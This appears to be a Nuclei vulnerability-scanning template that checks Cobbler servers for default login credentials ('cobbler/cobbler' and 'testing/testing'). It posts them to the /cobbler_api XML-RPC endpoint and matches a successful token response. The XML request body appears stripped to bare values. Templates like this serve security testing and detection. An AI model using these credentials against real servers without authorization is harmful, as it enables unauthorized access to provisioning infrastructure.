id: cobbler-default-login
info:
name: Cobbler Default Login
author: c-sh0
severity: high
description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
reference:
- https://seclists.org/oss-sec/2022/q1/146
- https://github.com/cobbler/cobbler/issues/2307
- https://github.com/cobbler/cobbler/issues/2909
classification:
cwe-id: CWE-798
tags: cobbler,default-login,api
requests:
- raw:
- |
POST {{BaseURL}}/cobbler_api HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
login
{{username}}
{{password}}
attack: pitchfork
payloads:
username:
- cobbler
- testing
password:
- cobbler
- testing
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/xml'
- type: dsl
dsl:
- "!contains(tolower(body), 'faultCode')"
- "!contains(tolower(body), 'login failed')"
condition: or
- type: regex
part: body
regex:
- "(.*[a-zA-Z0-9].+==)"
# Enhanced by mp on 2022/03/03